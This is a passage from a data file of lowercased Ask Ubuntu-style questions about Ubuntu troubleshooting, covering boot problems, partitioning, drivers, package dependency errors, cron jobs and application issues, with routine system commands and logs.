displayport-0 status : off width : -1 height : -1 rate : -1 primary : false position : -1 -1 ( gnome-settings-daemon:2955 ) : gdk-warning ** : the program 'gnome-settings-daemon ' received an x window system error . this probably reflects a bug in the program . the error was 'badmatch ( invalid parameter attributes ) ' . ( details : serial 274 error_code 8 request_code 140 minor_code 30 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) additional commands and outputs : sudo uname -u linux yunus-550p5c-550p7c 3.8.0-31-generic # 46~precise1-ubuntu smp wed sep 11 18:21:16 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise sudo dpkg -l | grep xserver-xorg-video-intel ii xserver-xorg-video-intel-lts-raring 2:2.21.6-0ubuntu4.1~precise1 x.org x server -- intel i8xx , i9xx display driver cat /etc/x11/default-display-manager /usr/sbin/lightdm sudo apt-get install lightdm reading package lists ... done building dependency tree reading state information ... done lightdm is already the newest version . the following packages were automatically installed and are no longer required : xbindkeys thunderbird-globalmenu use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
355271	how do i set up a semi-encrypted ubuntu installation ?	you know that ubuntu installer has an option to encrypt the whole root partition . the password is asked every time you boot . this seems to be a great deal , easy , convenient , really nice except one thing - i do n't think that it is so necessary to encrypt the whole installation . it would be nice to set up separate partitions for private information ( like /var and /home ) and keep them encrypted while leaving system files ( all binaries , mans , etc . ) unencrypted . i think it should be nice not so much for performance but for ssd life-time and stability . so , the password is asked on every boot like it has the whole installation encrypted , but actually only several partitions are encrypted . is there a way to set that up smoothly during installation ? and what do you think about all that ? please advise .
355273	how do i install 0 a.d. ?	what is 0 a.d. and how can i install it on ubuntu ?
355277	ubuntu 12.04 installed on usb but i ca n't try it before installing	i successfully installed ubuntu 12.04 on my 8gb usb stick with - universal usb installer - lili usb creator and - unetbootin and it boots from it too but when i choose for try it without installing it gets tuck after a while . here are the screenshots of what happens or where it stucks . i previously had it installed on the same system without much problems but this time it wo n't even run from the usb , installing is another story as i do n't want to install it for now . https : //www.dropbox.com/s/wij3rb5y156f8op/20131008_133438.jpg https : //www.dropbox.com/s/lxuhh8vi1ey8wis/20131008_143319.jpg the 2nd image is where it wo n't go any further . please help out and let me know what is it that i am doing wrong . thank you .
355280	kcm gtk settings ignored , how can i make gtk apps use kde icons ?	i am using kubuntu 13.04 ( raring ) 64-bit . after upgrading to kde sc 4.11.2 ( from ppa : kubuntu-ppa/backports ) gtk applications mostly do not use the icons selected in kubuntu 's gtk kcm . i say mostly because in a very few places such as back and forward buttons , and folders in gtk file choosers the icons selected in the kcm are used . all other icons are either from the default oxygen icon theme or from the default gnome icon theme ( varies with the icon theme selected ) . i have neither gnome nor any of the gnome-icon-theme packages installed . i get this behaviour in most icon themes including kfaenza and elementary usu , however , in a very few themes , such as fluorine , all icons in gtk applications are the correct ones from the theme . i have searched a lot on the web but found no solution . is there a way to make gtk applications use all icons correctly from the icon theme selected in the kcm ?
355281	mount an .iso converted from .bin	please how do i mount an .iso converted from .bin ? the .bin had no .cue si i created one the lines of the .cue file : file `` file.bin '' binary track 01 mode1/2352 index 01 00:00:00 i used command bchunk setup-1a.bin setup-1a.cue setup-1a when trying to mount my .iso file using mount setup-1a01.iso /mnt/iso mount : you must specify the filesystem type than i tried mount -t iso9660 setup-1a01.iso /mnt/iso/ but mount : wrong fs type , bad option , bad superblock on /dev/loop0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so thank you for your help
355285	how to expand primary partition when wubi is used to install ?	i have installed ubunut 12.04 using wubi . the `` installation size '' options i chosen was 18gb i.e the amount of space you want to `` give up '' for wubi . that is the space wubi 's ubuntu install is able to use . wubi creates a disk image ( loopmounted device ) on your host system in/on which ubuntu is installed . now , i am running out of memory in primary partition . could anyone help me out to extend/stretch the partition size ?
355287	grub loading twice because of windows bootloader	i recently began studying again and had to install windows 7 to run some proprietary software ( autocad ) . i used to run ubuntu 13.04 and all was good . however to install windows i made a complete re-installation as it sounded like the easiest thing to do at the time ( no need to reconfigure grub or shrinking partitions and all that ) . i then went on to installed ubuntu again to run alongside windows - but the install was somehow interrupted or the usb had a flaw , i dunno . anyhow the grub-install part worked - i could boot , get the choice between ubuntu or windows only ubuntu does n't work . i then ( for some reason ) decided to install linux mint . it worked like a charm and is currently running . but , when booting , the computer will first load grub with the options of either linux mint , ( some recovery modes ) or a windows loader . choosing the windows loader it loads grub again , but this time the `` original '' one with the options of ubuntu or windows . from here i can choose windows and it works fine still . all just rather annoying and messy . now i would really like to have to only go through one grub menu . and hopefully without having to reinstall windows . i hope someone has an idea for an approach to solve the problem , or just some input to an explanation in plain words what has happened . best regards //a
355289	touchpad not working on xubuntu on samsung n100	the touchpad on my samsung n100 is not working . i have xubuntu 13.04 installed and have tried different configurations
355294	apache ssl server not starting	i have installed apache 2.0.58 together with php 5.1.4 . when i start the server using ./apachectl start , i manage to get the server running to serve `` http '' pages as well as `` php '' pages , but when i try to start ssl for https using ./apachectl startssl , i get the error below : ( 125 ) address already in use : make_sock : could not bind to address [ : : ] :54912 no listening sockets available , shutting down unable to open logs for reference , i hosted my https page on port 54912 , and while in httpd.conf it already has the listen 54912 directive , i also changed the file ssl.conf to listen 54912 from the default listen 443 . any idea how i can get my server to run and serve https ?
355296	problem installing dssp in ubuntu 12.10	i am trying to install `` dssp '' in ubuntu 12.10 , i just download it from ubuntu software centre but when i run it i am getting the following error , any solution ? fatal error : failed to execute command : /usr/local/bin/dssp -na ddzgp3et ddjex0j9 > /dev/null 2 > /dev/null
355297	gnome-terminal tabs : no contrast between active and inactive tabs	in ubuntu 13.04 , i often have multiple tabs open in gnome-terminal . the problem is that , while i can set the title of each tab , it is very hard to tell which tab is active -- the color and rendering distinction between the active tab and the inactive tab is so subtle that one must study the tab bar very carefully . is there a way to make this contrast more obvious ?
355301	terminal web browser page reload	how do i schedule the reloading of a page when using a terminal browser ? using any of : elinks , w3m etc
355302	how can i create isos quickly using all 16 cores of a parallella board ?	i have a large video collection ( over 900 disks ) . using handbrake to rip to .mp4 is painfully slow , especially when ripping brd . i found another solution that will play back isos , but i want to be able to do this very quickly . how can i get ubuntu , running on a 16-core parallella board , to use all cores to get the job done fast ?
355304	suitable method to redirect connected clients to webpage	following this tutorial , i am able to create a wireless access point which other devices can connect to . further more , a connected client can browse to a cakephp installation hosted on the access point . now , i wanted to create a captive portal which redirects any clients to a web page . i have been looking at this tutorial to set up wifidog . however , this seems a bit like overkill for what i want to do . are there a simple set of ip table rules to redirect any connected clients to a web page on the access point ? would it be better to try and do it through dhcp.conf ? any shove in the right direction would be appreciated !
355306	microsoft explorer touch mouse compatibility	is the microsoft explorer touch mouse fully compliant with ubuntu ? in particular the horizontal scrolling ?
355309	booting ubuntu 12.04 in unity the windows theme & icon theme reversed back to and always locked to ubuntu default	i did set up last year faience-ocre as my icon theme and adwaita cupertino l unity as my windows theme ( the gtk+ thme was unchanged to adwaita ( default ) ) . it has worked perfectly well until 3 days ago when starting my pc i saw the ubuntu default showing up for windows & icon theme . i noticed that at start-up the disk access led is not lit up continuously as before but at moment stops reading for a few seconds ( up to 15 s ) then complete the disk reading process . when all was working well this led would lit up continuously . another thing is that gnome applications are as well not working well as previously nautilus and gedit now do n't use the global menu in the system bar but a local window menu . nautilus - nemo before the incident nautilus - nemo now ... i did open dconf to check the desktop settings in org-gnome-desktop-wm-preferences and everything is looking good . when i change the settings in the app advanced settings in the theme folder i see the respective value changing in dconf . however , there is no change on my desktop . it looks like it 's crippled and gnome related . [ update 1 ] : i have the same defect as referenced @ ubuntu theme suddenly changed to default and it 's not coming back ! instead of my gtk theme i get a classic , windows-95-like grayish theme ... however one of the solution mentionned : http : //www.webupd8.org/2011/06/fix-ubuntu-linux-mint-theme-changing-to.html is not working at all , even for 20 s up to 60 s delay .
355316	how to overpass boot device selection ?	i use toshiba portege r500 notebook and ubuntu 13.04 . when i start my notebook my machine shows display on screen as name of company , intel logo and devices to select which device to boot such as hdd , sd card ( from inbuilt card slot ) , cd , lan connection , usb . i installed ubuntu on hdd and if i do nothing this window goes off and ubuntu starts automatically . i remind here that no grub window appear here . my problem is i do n't want to wait till the machine selects the boot device as hdd , i want it should done quickly . i can press in mean time f2 to enter into the selection of this window and i choose usb if i want to boot from any usb drive . please help me to overpass this window and directly boot to hdd or permanently set boot device to hdd ! as further detail i want to tell that i think this window is from my toshiba notebook ( from manufacturer ) and not from ubuntu !
355318	how to install ubuntu on the asus fonepad me371mg ?	here there was a problem , i can understand if i install ubuntu on a tablet , if so , in what way ? and how manuals
355320	connecting android app to sql server on ubuntu server	maybe i should ask this question in the ubuntu section instead , but do n't really know where the problem is so i 'm trying here first . i 'm trying to learn how to use sql database through a webserver , and i 've used this tutorial : link i 've done everything like in the tutorial , but i 'm using ubuntu server , not windows . the problem is that the app is not able to display or create any entries from/in the database . i use phpmyadmin to manage the sql database . 1 . so my main question : is there any difference between wamp/lamp ? or can i use the same approach ? if the answer is yes , then i have some more questions : i 'm using the default location for my server /var/www/ and have put all the .php files there ? correct ? when he makes the db_config.php he uses `` localhost '' but i want to use my ip instead , do i just have to change `` localhost '' to `` 81.xxx.xxx.xxx '' or do i need to add something more ? as you can see i 'm not really sure where the problem is , if it 's the compability between the tutorial and the lamp server instead of wamp , or if it 's the config of the connection , something in the php codes , the placement of the php files or whatever ? it 's so frustrating because i do n't know where to start . thank you in advance !
355321	can you set more than one property when pushing a pagestack ?	i am writing an app for utouch and i want to deliver more than one property . the code for one property : pagestack.push ( folgen , { serie : `` himym '' } ) is it possible to deliver more than one property ?
355322	ubuntu 12.04 hangs during boot , failed at `` starting netbios name server ''	i have newly installed ubuntu 12.04.3 lts on a macbook pro '13 , everything works fine but after i shared a folder and installed samba and some other features which the system prompt me to install when i share the folder , i ca n't boot the system anymore . it hangs on here : i can get network working in recovery mode and i removed samba in recovery mode but it does n't help . what can i do now ? i really do n't what to reinstall ubuntu .
355323	problem with bam huawei linux mobile partner	after minimizing the huawei linux mobile parnter window i ca n't restore it . commonly it must minimize to tray , but then it vanishs ( but the connection still work ) . what can i do ? ( distributor id : ubuntu | description : ubuntu 13.04 | release : 13.04 | codename : raring | unity 7.0.0 ) ubuntu is amd64 version , but the bam huawei linux mobile partner is for i386 version , it did n't open before installation ia32-libs
355324	i tried to install ubuntu 13.04 , but it failed	my last ubuntu 12.4 crashed , so i tried to install ubuntu 13.04 on my asus ee pc 4b , using an usb of 4gb ( unetbootin and the iso for ubuntu ) , and it failed . it appeared this message on the screen : '' busybox v1.20.2 ( ubuntu 1:1.20.0 -8ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built - in commands . ( initramfs ) mount : mounting / dev/ loop0 on //fylesystem . squashfs failes : invalid argument can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs `` what should i do ? thanks !
355325	why my airlive wl1700 usb dongle wo n't allow more than 54mb/s ?	my wireless speed is only 54 mb/s and it 's not moving down or up . i 've downloaded linux drivers and got tar.gz file .
355334	how to execute .deb files ?	i am new to ubuntu , i am working on avr micro controller for that i need to use avarice software , by using synaptic package manager i installed avarice but i am not able to find it in application files . so how to open that software ? and if any knows about avarice i request to help me in working over it
355343	crontab stopped working after i changed permissions for /var/spool/cron/crontabs/root	firstly , i know this is bad practice , i should not ideally do it and blah blah . however , i have an php app writing to the /var/spool/cron/crontabs/root hence for testing i changed the permissions to 777 , as soon i did that the crontab stopped working , though the syntax is perfectly fine . question : does crontab need a rw only for the user whose cron it is , why is it not working ? and how can i make it working ? thanks a lot in advance .
355344	gdm login screen problem	i have installed ubuntu studio 13.04 and with synaptic i have downloaded gnome . after that installation when i want to boot up computer it boots , but do n't show up gdm login screen , it shows only command prompt . how can i repair this ? can anyone help me ?
355345	failed to execute /init : kernel panic - not syncing : no init found	here 's my setup : dual booting with windows 7 on /dev/sda1 , ubuntu 13.04 on /dev/sda5 ( home on /dev/sdb if it 's relevant ) coming from using ubuntu 13.04 , 32-bit version for a few months i need to install ubuntu 13.04 , 64-bit , though i 've been having some problems doing it . i 'm installing off of a usb key i created using unetbootin . the live image seems to work correctly . i 've attempted custom installs and letting the installer choose the partition layout but it does not seem to affect the problem.here are the other problems i 've run into in order of occurrence : '/grub/i386-pc/normal.mod ' not found sector 32 still in use according to grub-install ( i did zero out sector 32 just to rule this out ) so now i 'm running into this problem : 13.04 : kernel panic - not syncing : no init found the stock answer to this seems to be some sort of file system problem . i 've fsck 'd all the things i know to fsck ( /dev/sda5 and the home drive ) but it reports the file system is clean . i 've checksummed the disk image i 'm using and it checks out as well . the panic message recommends setting the init= option of the kernel command , which i 've tried to do ( /sbin/init and even dropping a copy of init in /boot just to see if anything different happens ) to no avail as well . i 've exhausted what i know to do , so just to be pedantic i 'm trying an install from optical media as well which i ca n't report on yet . i do n't know grub that well but i am still a little worried about the i386-related error message , though it definitely looks like the 64-bit image of ubuntu is installed . edit : installing from a dvd ended up being the fix for me , though that may not be the best solution or even an option for some .
355347	where is the cd / dvd burner application	inserting a blank dvd does not pop up the autoplay . search in dash or ubuntu software centre does not match anything called cd / dvd creator . i tried brasero but it crashes . i 'm just trying to burn an .avi file here it is on the web https : //apps.ubuntu.com/cat/applications/lucid/nautilus-cd-burner/ but ca n't find it on my system . windows burned the disk fine . back in ubuntu i can use the send to method and this time when i insert the blank disc i get `` unable to mount blank dvd r disk , location is already mounted '' error and a dvdr icon in the launcher . ignoring the error i can get to the cd/dvd creator ... and it works now ? ! thanks for your help still not sure why it 's so temperamental .
355355	cron job as specific user not running	on my ubuntu box i have a crontab setup for my normal user that has the following : 0 0 * * * sudo mysqldump -u root -h localhost -- all-databases | gzip > /home/ < user > /mysqlbackups/db_`date + % f`.sql.gz when i run the script from shell it runs without any issue . sudo mysqldump -u root -h localhost -- all-databases | gzip > /home/ < user > /mysqlbackups/db_`date + % f`.sql.gz but with it set as a cron job it 's not running at all . i have my user set in my cron.allow file as well ( had to create the file as it did n't exist previously ) . kinda stumped at the moment and not sure what else to tweak/try to get this to run automatically at midnight . any ideas ? thanks ! edit : removed the 'sudo ' and it runs fine on my normal shell execution . i 'll find out if it runs off the cron automatically tonight .
355360	display file properties via terminal	what is the command line that displays file infos ( or properties ) such as in gui method update i knew that ls -l shows properties , however , my question is very clear ; such as in gui method . for example : instead of `rw-rw-r -- ` we have such gui rendering : abdennour @ estifeda : $ wishedcmd myfile ... .. permissions : owner access : read & write group access : read & write others access : read only ... ..
355361	problems installing python-dev	i am currently working on a project requiring me to extend python with a c library , and i will be using swig on ubuntu . worth noting is that i 'm doing this on a computer at my university , and i do n't have access to su or sudo commands . in order to generate a wrapper file i enter gcc -fpic -c output_test.c interface_wrap.c \ -i/usr/bin/python2.7 this line works perfectly when setting up pydev on eclipse , but does n't work here , which , as far as i can tell from googling the problem , can be solved by installing python-dev . so i downloaded python-dev , v. 2.7.3 for ubuntu and unpacked it . i have been unable to find any guide whatsoever that describes a manual installation of python-dev , so i 'm pretty much stuck here . after the unpacking , then what ? looking at the unpacked folders , i am able to find that there are two files in the ~/python-dev/usr/bin-folder : python-config python2-config neither is executable . in fact , ubuntu treats them as broken links . so what am i supposed to do at this point ? and why is there such a lack of a comprehensible guides for installing this ?
355364	run wine command from python	i have apache that serves a web service with a python script . i trie to execute a wine command from python , but nothing happens ... command1 = 'dir > test.txt' command2 = 'wine someexecutable.exe inputfile outpufile' p = subprocess.call ( command1 , shell=true ) p = subprocess.call ( command2 , shell=true ) the command1 is normally executed , and i get a test.txt file . it seems that command2 is not executed at all ... if i execute it manually from the shell with www-data user , the command2 exectues and i get the output file - > not a permission problem . is there something to configure to allow python to execute wine commands ?
355376	gnome-shell : depends : gnome-settings-daemon ( > = 3.8.0 ) but 3.6.4-0ubuntu8 is to be installed	i try loggin in my account e only a black screen is showing for me . analizing .xsession-errors file : localuser : desenvolvimento being added to access control list script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . x-session-manager [ 3589 ] : warning : unable to find required component 'gnome-shell' x-session-manager [ 3589 ] : critical : we failed , but the fail whale is dead . sorry ... . x-session-manager [ 3589 ] : warning : failed isactive call to consolekit : rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.80 '' ( uid=1000 pid=3589 comm= '' x-session-manager `` ) interface= '' org.freedesktop.consolekit.manager '' member= '' isactive '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.21 '' ( uid=0 pid=1375 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) trying reinstall gnome-shell $ sudo apt-get install gnome-shell reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : gnome-settings-daemon ( > = 3.8.0 ) but 3.6.4-0ubuntu8 is to be installed e : unable to correct problems , you have held broken packages . $ sudo apt-get install -- reinstall gnome-shell = > above error $ sudo apt-get -v dist-upgrade = > nothing $ sudo apt-get changelog = > e : handler silently failed $ sudo apt-get autoremove = > notning $ sudo apt-get autoclean = > nothing $ sudo apt-get update $ sudo apt-get upgrade $ sudo rm -r /var/lib/apt/lists/* -vf $ sudo apt-get -- fix-broken install i 've tried everything . how i resolve this ?
355378	acer aspire running ubuntu 13.04 running slow/locking up with xfce	i 'm having serious speed problems with my laptop lately . i had been experiencing periodic lock ups using windows 7 , so i switched to ubuntu ( raring , 13.04 ) . i eventually install xfce in order to help keep it fast , but it 's still locking up periodically . the only indication i get that the computer is doing something excessive is the hard drive light on the computer , my cpu loads and ram loads remain under 50 % , and iotop does n't show much of anything going on even though the light turns on for extended periods of time , even when nothing is happening . my hdparm levels are i 'll be torrenting 3 or 4 files , and running firefox with one browser window ( with only conky & dropbox running in addition ) and the firefox window ( chrome does the same thing ) will stop loading , the programs will lock up ( the mouse remains mobile ) . i have 3 gigs of ram , intel ( r ) pentium ( r ) cpu u5600 @ 1.33ghz , and a 500g hard drive with two partitions , neither of which is more than 75 % full . i have run an abundance of tests and the only thing that turned up anything significant was running ubuntu 's system test which returned memory/info failed fail : difference is 339046400 bytes ( 10.53 % ) and greater than the 10 % threshold . /proc/meminfo reports : 2882179072 kb dmi reports : 3221225472 kb please let me know what i can do to get rid of this problem , i 'm relatively new to ubuntu , and i 'm completely lost as to why this relatively new computer is giving me so many speed problems with so little running . also , my hdparm output is : /dev/sda : timing cached reads : 3870 mb in 2.00 seconds = 1935.23 mb/sec timing buffered disk reads : 30 mb in 3.02 seconds = 9.93 mb/sec
355383	how to get back lost capacity after using gparted ?	i have a laptop with a single intel 80gb ssd . i originaly only had w7 , but installed ubuntu on a small partition of this disk . recently i wanted to expand the partition containing ubuntu and so booted up from a usb to run gparted from there . the idea was to resize the w7 partition and use this extra space for my ubuntu partition . i had : windows partition 61gb ubuntu partition 9,3gb linux-swap 4gb resizing the w7 partition using gparted went fine , which gave me some unallocated disk space . i now needed to move this unallocated space next to my ubuntu partition . to do this i deleted the swap disk used by ubuntu in order to expand the ubuntu partition in to this area of the hard drive . which means i had : windows partition 56,17gb unallocated 4,88gb ubuntu partition 9,3gb unallocated 4gb i then used then used the unallocated space from the windows partition as a new swap disk : windows partition 56,17gb linux-swap 4,88gb ubuntu partition 9,3gb unallocated 4gb and at last i wanted to extend my ubuntu partition to include the now unallocated space from the old swap . this is where i had trouble . i tried do resize the ubuntu partition in gparted , but got an error message that i did not save . the ubuntu partition did grow however and according to gparted i now have : windows partition 56,17gb linux-swap 4,88gb ubuntu partition 13,5gb the problem is that the additional 4gb in the ubuntu partition do n't show up , it is as if i gained 4gb , but that these 4gb are being used by some file . when running df -h the partition is still being listed as 9,3gb and not 13,5gb as in gparted . filesystem size used avail use % mounted on /dev/sda5 9,3g 7,5g 1,3g 86 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 2,0g 12k 2,0g 1 % /dev tmpfs 393m 864k 392m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 2,0g 488k 2,0g 1 % /run/shm none 100m 36k 100m 1 % /run/user /dev/sda1 57g 44g 13g 79 % /media/os i wanted to post an image of disk utility , but as this is my first question i 'm not allowed . it does show the partition as being 14gb however . i have tried using fstrim -v / , but this did n't seem to help . gparted 0.12.1 -- enable-libparted-dmraid libparted 2.3 check and repair file system ( ext4 ) on /dev/sda5 00:00:04 ( error ) calibrate /dev/sda5 00:00:00 ( success ) path : /dev/sda5 start : 128,047,104 end : 156,301,311 size : 28,254,208 ( 13.47 gib ) check file system on /dev/sda5 for errors and ( if possible ) fix them 00:00:04 ( success ) e2fsck -f -y -v /dev/sda5 pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information 234643 inodes used ( 37.27 % , out of 629552 ) 332 non-contiguous files ( 0.1 % ) 596 non-contiguous directories ( 0.3 % ) # of inodes with ind/dind/tind blocks : 0/0/0 extent depth histogram : 185927/200 1840791 blocks used ( 73.84 % , out of 2492928 ) 0 bad blocks 0 large files 144531 regular files 20184 directories 57 character device files 25 block device files 0 fifos 30 links 69834 symbolic links ( 48423 fast symbolic links ) 3 sockets -- -- -- -- -- -- 234664 files e2fsck 1.42.5 ( 29-jul-2012 ) grow file system to fill the partition 00:00:00 ( error ) resize2fs /dev/sda5 resize2fs 1.42.5 ( 29-jul-2012 ) resize2fs : /dev/sda5 : the combination of flex_bg and ! resize_inode features is not supported by resize2fs .
355388	wired internet connected but is n't loading	i have recently installed ubuntu on my laptop . i am pretty used to windows , and so i lost the track of my wifi router 's password . in windows , we had a push-button-to-connect option , but sadly ubuntu does n't have one . so i tried removing the ethernet cable and directly connecting it to my laptop . after doing that , it shows `` network connected '' with that icon on top , but when i try to open web pages , it does n't load . what 's happening ? help !
355389	how to do partition in ubuntu after installation ?	disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x344916fc device boot start end blocks id system /dev/sda1 * 2048 1945391103 972694528 83 linux /dev/sda2 1945393150 1953523711 4065281 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 1945393152 1953523711 4065280 82 linux swap / solaris shivam @ shivam-inspiron-5521 : ~ $
355398	gtk : webkit webview c++ ( ca n't load url + awkward terminal output )	i am trying to include a webkit webview within my c++ application . my project uses glade ui , and i embedded webview into a scrolled window . what i do not understand at all is this awkward output + the url is not loaded : zubozrout @ frozenlinux : ~/downloads/devel/ssm4/usr/bin $ g++ ssm.cpp -o steamskinmanager `pkg-config -- cflags -- libs gtk+-3.0` `pkg-config -- cflags -- libs webkitgtk-3.0` & & ./steamskinmanager no bp log location saved , using default . [ 000:000 ] cpu : 6.58.9 , x4 , 2401mhz , 9447mb [ 000:000 ] computer model : not available [ 000:000 ] browser xembed support present : 1 [ 000:000 ] browser toolkit is gtk2 . [ 000:000 ] using gtk2 toolkit no bp log location saved , using default . [ 000:000 ] cpu : 6.58.9 , x4 , 2401mhz , 9447mb [ 000:000 ] computer model : not available [ 000:013 ] warning ( optionsfile.cc:47 ) : load : could not open file , err=2 [ 000:013 ] no bp log location saved , using default . [ 000:014 ] cpu : 6.58.9 , x4 , 2401mhz , 9447mb [ 000:014 ] computer model : not available [ 000:014 ] browser xembed support present : 1 [ 000:014 ] browser toolkit is gtk2 . [ 000:014 ] using gtk2 toolkit [ 000:013 ] warning ( optionsfile.cc:47 ) : load : could not open file , err=2 [ 000:013 ] no bp log location saved , using default . [ 000:014 ] cpu : 6.58.9 , x4 , 2401mhz , 9447mb [ 000:014 ] computer model : not available here is the webview part of my code : builder = gtk_builder_new ( ) ; gtk_builder_add_from_file ( builder , `` ui.glade '' , null ) ; window = gtk_widget ( gtk_builder_get_object ( builder , `` window '' ) ) ; gtk_builder_connect_signals ( builder , null ) ; [ ... ] gobject* webview_help ; webview_help = gtk_builder_get_object ( builder , `` webview_help '' ) ; webkitwebview *webview = webkit_web_view ( webkit_web_view_new ( ) ) ; gtk_scrolled_window_set_policy ( gtk_scrolled_window ( webview_help ) , gtk_policy_automatic , gtk_policy_automatic ) ; g_object_ref_sink ( g_object ( webview ) ) ; gtk_container_add ( gtk_container ( webview_help ) , gtk_widget ( webview ) ) ; webkit_web_view_load_uri ( webview , `` http : //www.google.com '' ) ; g_object_unref ( webview ) ; unfortunately , there are not many tutorials describing gtk webview usage . as an inspiration , i used this ( it it probable i missed something ) . sadly , i ca n't find the solution to my problem . thank you very much for your help .
355399	sound not working at all in skype	i ca n't get sound to work at all in skype ( version 4.2.0.11 ) . video works fine , but when i try a test call it just says `` problem with audio playback '' . i 'm running xubuntu 13.04 . there are many many options in the settings for sound ( image attached ) - have tried all of them and none work . any suggestions gratefully received !
355402	recover ubuntu from shutdown	my ubuntu laptop shutted down while upgrading ( sudo apt-get upgrade ) because of an empty battery . now when i 'm turning my laptop on , screen is empty after log in , right click is not a function . also i can not log in with terminal screen ( ctrl+alt+f1 ) ( i 'm sure that my login and password are correct ) . i can see my screen , files and menus only from recovery mode , in low graphics mode and without network connection . any suggestions ?
355405	installing ubuntu to c:	i have created a bootable usb stick , i will create ubuntu to c : but i have some saved documents like picture at d : if i install ubuntu to c : , backup files from d : will erase ?
355408	ca n't find a software center badge ?	i just published my game `` plush '' to the software center , and i want to have a badge on my website that links to the web listing , but based on my searches , software center does n't seem to have a `` badge '' ( for example , here 's google play 's : http : //developer.android.com/distribute/googleplay/promote/badges.html ) am i just missing it ? if there really is n't one , i guess i just use an ubuntu logo ?
355409	battery usage got very high after switching to ubuntu ( hp pavilion g6-2348sg )	i just switched to ubuntu from windows 7 on my hp pavilion g6-2348sg notebook and it seems like the battery usage increased a lot . also , i cant find any drivers , which would probably solve the problem.. i hope you guys can help me . edit : i have a radeon hd 7670m graphics card
355415	document file does n't want to open anymore . what to do ?	i have worked with ubuntu for a few months . before there has n't been a problem in opening word excel document file . but since the last 5 days the ubuntu program opens fine and all the icons of the document files are visible but i 'm unable to open them . what need to be done to access those documents again .
355420	unable to import tkinter ?	i am studying python and tried to make gui using python.i am using idle 3.2 on 12.04 ubuntu.when i typed import tkinter , a error comes , it says following : traceback ( most recent call last ) : file `` < pyshell # 0 > '' , line 1 , in < module > import tkinter importerror : no module named tkinter any ideas on what 's going wrong and how i can resolve this ?
355422	is this a misreading , or should i be concerned ? lm-sensors output	i have an amd quad ( a10 ) desktop , which has the following output from sensors : $ sensors f71808a-isa-0600 adapter : isa adapter +3.3v : +3.28 v in1 : +0.00 v in2 : +0.00 v in3 : +0.00 v 3vsb : +3.28 v vbat : +3.46 v fan1 : 888 rpm fan2 : 991 rpm fan3 : 0 rpm alarm temp1 : +231.0°c ( high = +85.0°c , hyst = +81.0°c ) ( crit = +100.0°c , hyst = +96.0°c ) sensor = thermistor temp2 : +35.0°c ( high = +85.0°c , hyst = +81.0°c ) ( crit = +100.0°c , hyst = +96.0°c ) sensor = transistor k10temp-pci-00c3 adapter : pci adapter temp1 : +31.1°c ( high = +70.0°c ) ( crit = +70.0°c , hyst = +69.0°c ) that temp1 reading is so high it looks wrong . it has been like that for a while , and the computer still works . thoughts ?
355430	how do i get chromium or firefox manage multi touch events properly ?	i am using ubuntu 12.04 and have a multitouch capable screen ( 3m microtouch usb controller ) but ca n't get any touch events inside a browser window ( firefox or chromium ) . i see all gestures with geistest -w windowid program . i have a multitouch demo tetris program which works . so basically the touch screen is supported on a lower level , but both browser applications do n't get any touch events , only mouse events . what do i have to do to get a proper setup for this ? thanks , jรถrn
355432	how to fix flickering sound	i switched completely to ubuntu 12.04 everything is fine instead when i play any track or video , the visual performance is good but the sounds flickers always and when i try to increase the volume it starts to flicker more . i installed ubuntu restricted extras , checked my hardware , hardware drivers etc .
355435	google chrome profile error	whenever i right-click the launcher and choose `` new window '' or click a link outside of chrome a new window opens up with the following message : your profile could not be opened correctly . some features may be unavailable . please check that the profile exists and you have permission to read and write its contents . if i start the browser normally everything works fine . i 'm using ubuntu 13.04 . thanks in advance .
355444	is it possible to access my files on a computer without logging in ?	i am a total noob and i screwed up ubuntu 13.04 amd64 file permissions royally . currently i can not log in nor can i access anything useful from guest . since 13.10 is imminent , i 'd like to transfer all my docs , media , etc. , to a whole new installation . how can i do that ?
355452	install gtk+ 3.0 on ubuntu	how can i upgrade my gtk version ? i have this version now : axept @ axept-net : ~ $ dpkg -s libgtk2.0-0|grep '^version' version : 2.24.20-1ubuntu1 i need version 3.0 to use the new released version of banshee 2.9.0 . how do i upgrade or install gtk 3.0 ? on ubuntu 13.04 , and will it be the same way on 13.10 ?
355453	it is possible to put ubuntu on my htc wildfire s ? and how ?	i have a htc wildfire s it is rooted but is it possible to get ubuntu on my phone ? if so , how ? i am not so smart with this so please if it is possible a full tutorial ?
355456	not able to play a video clearly on ubuntu terminal	i have downloaded a video from youtube using the ubuntu command-line ( virtual pc ) sudo apt-get install youtube-dl youtube-dl http : < url > i am trying to play a video after installing sudo apt-get install mplayer i issued below the command mplayer -vo caca vlhjufgxeo4.mp4 it is playing a video , but the video is not clear . some ascii characters are displaying . how can i view the video clearly ? i am using ubuntu 12.04
355459	how to stop administrative password change	it is extremely easy in ubuntu to change the administrator password by using the recovery console and dropping to root . is there any way to stop a root user from changing the administrative password ?
